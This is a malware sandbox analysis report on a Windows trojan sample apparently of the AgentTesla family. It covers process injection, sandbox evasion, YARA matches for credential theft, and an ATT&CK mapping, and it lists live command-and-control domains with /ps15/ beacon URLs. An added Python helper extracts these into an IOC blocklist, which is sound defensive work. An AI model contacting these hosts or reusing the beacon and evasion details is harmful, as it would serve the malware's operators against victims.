                Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: GetLocaleInfoW,CmAtolW,GetNumberFormatW,lstrlenW,CmIsDigitW, | 14_2_003361CA
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Queries volume information: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe VolumeInformation
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_003373D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, | 14_2_003373D5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match | File source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique is the count shown in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 2 Command and Scripting Interpreter; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 612 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 612 Process Injection; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 1 System Time Discovery; 231 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 223 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 1 Encrypted Channel; 4 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph (ID: 1479545, Sample: xU0wdBC6XWRZ6UY.exe, Startdate: 23/07/2024, Architecture: WINDOWS, Score: 100). The graph itself is an image; the process tree and annotations recovered from its text are:
                Start: www.thepeacedealers.com, www.resmierabaru20.shop, 20 other IPs or domains; signatures: Found malware configuration, Malicious sample detected (through community Yara rule), Multi AV Scanner detection for submitted file, 9 other signatures
                  xU0wdBC6XWRZ6UY.exe (started): dropped C:\Users\user\...\xU0wdBC6XWRZ6UY.exe.log (ASCII); signatures: Tries to detect virtualization through RDTSC time measurements, Injects a PE file into a foreign processes, Switches to a custom stack to bypass stack traces
                    xU0wdBC6XWRZ6UY.exe (started): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, 2 other signatures
                      explorer.exe (injected): ext-sq.squarespace.com 198.185.159.144, 53903, 80 SQUARESPACEUS United States; resmierabaru20.shop 172.96.187.60, 53902, 80 SINGLEHOP-LLCUS Canada; 4 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
                        cmmon32.exe (started): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements, Switches to a custom stack to bypass stack traces
                          cmd.exe (started)
                            conhost.exe (started)

                Source | Detection | Scanner | Label
                xU0wdBC6XWRZ6UY.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                xU0wdBC6XWRZ6UY.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
                https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
                https://excel.office.com | 0% | URL Reputation | safe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                https://word.office.com | 0% | URL Reputation | safe
                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
                https://outlook.com | 0% | URL Reputation | safe
                https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
                http://schemas.micro | 0% | URL Reputation | safe
                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
                http://www.ellipsive.com/ps15/ | 0% | Avira URL Cloud | safe
                http://www.resmierabaru20.shopReferer: | 0% | Avira URL Cloud | safe
                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | 0% | Avira URL Cloud | safe
                http://www.33pgaaa.com/ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 | 0% | Avira URL Cloud | safe
                https://api.msn.com:443/v1/news/Feed/Windows?t | 0% | Avira URL Cloud | safe
                http://www.gmgex1.com/ps15/www.passrmale.com | 0% | Avira URL Cloud | safe
                http://www.thepeacedealers.com/ps15/ | 0% | Avira URL Cloud | safe
                https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | 0% | Avira URL Cloud | safe
                https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter | 0% | Avira URL Cloud | safe
                http://www.trezorsuite.net | 0% | Avira URL Cloud | safe
                http://www.gomenasorry.com/ps15/ | 0% | Avira URL Cloud | safe
                http://www.thepeacedealers.com | 0% | Avira URL Cloud | safe
                https://wns.windows.com/ | 0% | Avira URL Cloud | safe
                http://www.ellipsive.com/ps15/www.mayson-wedding.com | 0% | Avira URL Cloud | safe
                http://www.gomenasorry.com/ps15/www.briefout.cloud | 0% | Avira URL Cloud | safe
                https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc | 0% | Avira URL Cloud | safe
                http://www.kaidifeiniroo.netReferer: | 0% | Avira URL Cloud | safe
                http://www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== | 0% | Avira URL Cloud | safe
                http://www.plasoi.xyz/ps15/www.stdaev.com | 0% | Avira URL Cloud | safe
                http://www.fashiontrendshub.xyzReferer: | 0% | Avira URL Cloud | safe
                http://www.gmgex1.com | 0% | Avira URL Cloud | safe
                http://www.resmierabaru20.shop/ps15/ | 0% | Avira URL Cloud | safe
                http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
                http://www.trezorsuite.net/ps15/www.gomenasorry.com | 0% | Avira URL Cloud | safe
                http://www.seraphmovement.com/ps15/ | 0% | Avira URL Cloud | safe
                http://www.passrmale.com/ps15/ | 0% | Avira URL Cloud | safe
                http://www.gmgex1.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== | 0% | Avira URL Cloud | safe
                http://www.resmierabaru20.shop | 0% | Avira URL Cloud | safe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | 0% | Avira URL Cloud | safe
                http://www.thepeacedealers.com/ps15/www.casinomaxnodepositbonus.icu | 0% | Avira URL Cloud | safe
                http://www.casinomaxnodepositbonus.icu/ps15/www.33pgaaa.com | 0% | Avira URL Cloud | safe
                http://www.seraphmovement.com/ps15/www.fashiontrendshub.xyz | 0% | Avira URL Cloud | safe
                http://www.passrmale.com | 0% | Avira URL Cloud | safe
                http://www.33pgaaa.com/ps15/ | 0% | Avira URL Cloud | safe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | 0% | Avira URL Cloud | safe
                http://www.casinomaxnodepositbonus.icu0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
                http://www.mayson-wedding.com/ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                http://www.stdaev.com/ps15/www.seraphmovement.com0%Avira URL Cloudsafe
                http://www.mayson-wedding.com/ps15/0%Avira URL Cloudsafe
                https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
                http://www.gomenasorry.com0%Avira URL Cloudsafe
                http://www.ellipsive.com0%Avira URL Cloudsafe
                http://www.briefout.cloudReferer:0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
                https://www.pollensense.com/0%Avira URL Cloudsafe
                http://www.mayson-wedding.com0%Avira URL Cloudsafe
                http://www.33pgaaa.comReferer:0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net/ps15/www.plasoi.xyz0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
                http://www.briefout.cloud/ps15/www.kaidifeiniroo.net0%Avira URL Cloudsafe
                http://www.fashiontrendshub.xyz0%Avira URL Cloudsafe
                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
                https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt0%Avira URL Cloudsafe
                http://www.seraphmovement.com0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net/ps15/0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-0%Avira URL Cloudsafe
                http://www.33pgaaa.com0%Avira URL Cloudsafe
                http://www.plasoi.xyzReferer:0%Avira URL Cloudsafe
                https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net/ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                http://www.gomenasorry.comReferer:0%Avira URL Cloudsafe
                http://www.plasoi.xyz0%Avira URL Cloudsafe
                http://www.casinomaxnodepositbonus.icuReferer:0%Avira URL Cloudsafe
                http://www.briefout.cloud0%Avira URL Cloudsafe
                http://www.passrmale.comReferer:0%Avira URL Cloudsafe
                http://www.gmgex1.comReferer:0%Avira URL Cloudsafe
                https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm0%Avira URL Cloudsafe
                http://www.thepeacedealers.comReferer:0%Avira URL Cloudsafe
                http://www.ellipsive.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ==0%Avira URL Cloudsafe
                http://www.thepeacedealers.com/ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
                http://www.passrmale.com/ps15/www.trezorsuite.net0%Avira URL Cloudsafe
                http://www.casinomaxnodepositbonus.icu/ps15/0%Avira URL Cloudsafe
                https://powerpoint.office.com0%Avira URL Cloudsafe
                http://www.briefout.cloud/ps15/0%Avira URL Cloudsafe
                http://www.foreca.com0%Avira URL Cloudsafe
                http://www.resmierabaru20.shop/ps15/www.thepeacedealers.com0%Avira URL Cloudsafe
                http://www.trezorsuite.netReferer:0%Avira URL Cloudsafe
                http://www.33pgaaa.com/ps15/www.ellipsive.com0%Avira URL Cloudsafe
                http://www.trezorsuite.net/ps15/0%Avira URL Cloudsafe
                http://www.gmgex1.com/ps15/0%Avira URL Cloudsafe
                http://www.stdaev.comReferer:0%Avira URL Cloudsafe
                http://www.plasoi.xyz/ps15/0%Avira URL Cloudsafe
                http://www.mayson-wedding.com/ps15/www.gmgex1.com0%Avira URL Cloudsafe
                http://www.ellipsive.comReferer:0%Avira URL Cloudsafe
                http://www.seraphmovement.comReferer:0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ss-k2-ss-k2.sspeeddns.com | 154.86.16.125 | true | false |  | unknown
gomenasorry.com | 184.154.46.218 | true | true |  | unknown
website-rendering.jouwweb.nl | 35.204.150.5 | true | false |  | unknown
ext-sq.squarespace.com | 198.185.159.144 | true | true |  | unknown
shops.myshopify.com | 23.227.38.74 | true | false |  | unknown
briefout.cloud | 103.56.204.76 | true | true |  | unknown
resmierabaru20.shop | 172.96.187.60 | true | true |  | unknown
www.gmgex1.com | 1.32.249.49 | true | false |  | unknown
www.trezorsuite.net | 172.67.214.13 | true | false |  | unknown
www.resmierabaru20.shop | unknown | unknown | true |  | unknown
www.33pgaaa.com | unknown | unknown | true |  | unknown
www.casinomaxnodepositbonus.icu | unknown | unknown | true |  | unknown
www.mayson-wedding.com | unknown | unknown | true |  | unknown
www.kaidifeiniroo.net | unknown | unknown | true |  | unknown
www.passrmale.com | unknown | unknown | true |  | unknown
www.briefout.cloud | unknown | unknown | true |  | unknown
www.thepeacedealers.com | unknown | unknown | true |  | unknown
www.ellipsive.com | unknown | unknown | true |  | unknown
www.gomenasorry.com | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.33pgaaa.com/ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 | false | Avira URL Cloud: safe | unknown
http://www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== | true | Avira URL Cloud: safe | unknown
http://www.gmgex1.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== | false | Avira URL Cloud: safe | unknown
http://www.mayson-wedding.com/ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0 | false | Avira URL Cloud: safe | unknown
http://www.kaidifeiniroo.net/ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0 | false | Avira URL Cloud: safe | unknown
http://www.ellipsive.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ== | false | Avira URL Cloud: safe | unknown
http://www.thepeacedealers.com/ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0 | true | Avira URL Cloud: safe | unknown
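An added helper for turning these URL tables into an IOC list; it is not part of the Joe Sandbox report or of the sample. When the report is exported as text, each row of the URL table above fuses the URL, detection percentage, scanner and label into one string, and each row of the Name/Source table that follows fuses the URL, its memory-dump references and the Malicious flag; the sample rows in the script are copied from this report in that fused form. The script splits the rows back apart, separates the three kinds of string recovered from explorer.exe memory (a full check-in URL under /ps15/ with its query blob, a bare host followed by the header name Referer:, and two hosts run together as A/ps15/www.B), collects the candidate C2 hosts and query parameters, and records which process image held each string. Treating /ps15/ as the campaign's check-in path, the list of process images, and the column names used for the split are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

# Rows copied verbatim from this report, in the fused form the HTML tables take
# when exported as text (URL, detection %, scanner and label run together).
# A subset for the example, not a complete IOC list.
URL_ROWS = [
    "https://excel.office.com0%URL Reputationsafe",
    "http://www.ellipsive.com/ps15/0%Avira URL Cloudsafe",
    "http://www.resmierabaru20.shopReferer:0%Avira URL Cloudsafe",
    "http://www.33pgaaa.com/ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe",
    "http://www.gmgex1.com/ps15/www.passrmale.com0%Avira URL Cloudsafe",
    "http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe",
]
# Same for the Name/Source/Malicious table: URL, "<process>, <dump>.sdmp" references, Malicious flag.
SOURCE_ROWS = [
    "https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000000C.00000002.3737130665.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://www.thepeacedealers.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmpfalse",
]

# Greedy URL group: the percentage is written minimally ("0%"), so the split is the
# rightmost digit run before "%". A URL that itself ends in digits stays ambiguous
# in this format; cross-check against the per-URL Malicious table.
URL_ROW_RE = re.compile(
    r"^(?P<url>.+)(?P<pct>\d{1,3})%(?P<scanner>URL Reputation|Avira URL Cloud)(?P<label>[a-z]+)$"
)
# Process images named in this report (assumed list). Anchoring on them is needed
# because a URL can end in letters that run straight into the process name.
KNOWN_PROCS = ("explorer.exe", "xU0wdBC6XWRZ6UY.exe")
_procs = "|".join(re.escape(p) for p in KNOWN_PROCS)
SOURCE_ROW_RE = re.compile(
    rf"^(?P<url>.+?)(?P<refs>(?:(?:{_procs}), [0-9A-F.]+\.sdmp(?:, )?)+)(?P<malicious>true|false)$"
)
# Path shared by every URL the report flags; treating it as the check-in path is an assumption.
C2_PATH = "/ps15/"


def parse_url_row(line):
    m = URL_ROW_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised URL row: {line!r}")
    return m["url"], int(m["pct"]), m["scanner"], m["label"]


def parse_source_row(line):
    m = SOURCE_ROW_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised source row: {line!r}")
    tokens = m["refs"].split(", ")
    return m["url"], list(zip(tokens[::2], tokens[1::2])), m["malicious"] == "true"


def classify(url):
    """Triage label for one recovered string."""
    if url.endswith("Referer:"):
        return "host_plus_header"  # host run straight into the next header name in memory
    parts = urlsplit(url)
    if not parts.path.startswith(C2_PATH):
        return "other"
    if parts.query:
        return "c2_beacon"  # full check-in URL carrying the encoded query blob
    tail = parts.path[len(C2_PATH):]
    return "host_pair" if tail.startswith("www.") else "c2_base"  # A/ps15/www.B: two hosts run together


def c2_hosts(url):
    """Candidate C2 hosts recoverable from one string (empty for benign noise)."""
    kind = classify(url)
    if kind == "other":
        return set()
    if kind == "host_plus_header":
        return {url.split("://", 1)[1].removesuffix("Referer:")}
    parts = urlsplit(url)
    hosts = {parts.hostname}
    if kind == "host_pair":
        hosts.add(parts.path[len(C2_PATH):])
    return hosts


def beacon_params(url):
    # Not parse_qs: the blobs contain literal '+' and '/' that it would decode.
    query = urlsplit(url).query
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def triage(url_rows, source_rows):
    hosts, beacons, unflagged, holders = set(), {}, [], {}
    for line in url_rows:
        url, _pct, _scanner, label = parse_url_row(line)
        found = c2_hosts(url)
        hosts |= found
        if classify(url) == "c2_beacon":
            beacons[urlsplit(url).hostname] = beacon_params(url)
        if found and label == "safe":
            unflagged.append(url)  # scanner says safe; the report's own verdict still stands
    for line in source_rows:
        url, refs, _malicious = parse_source_row(line)
        if c2_hosts(url):
            holders[url] = sorted({proc for proc, _dump in refs})  # which process held the string
    return {"hosts": sorted(hosts), "beacons": beacons, "unflagged": unflagged, "holders": holders}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(URL_ROWS, SOURCE_ROWS), indent=2))
```

Every flagged host comes back from Avira URL Cloud as "safe" with 0% detection: reputation lookups of freshly registered C2 domains lag, so the verdict to act on is the report's own Malicious flag (true for the resmierabaru20.shop and thepeacedealers.com check-in URLs in the table above), and the recovered hosts belong in a blocklist regardless of the scanner label. The source column attributes the C2 strings to explorer.exe memory dumps rather than to the sample's own process (only the xmlsoap claims URL comes from xU0wdBC6XWRZ6UY.exe), which is consistent with the process-injection signatures listed at the top of the report.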
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com:443/v1/news/Feed/Windows?t | explorer.exe, 0000000C.00000002.3737130665.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007276000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.resmierabaru20.shopReferer: | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
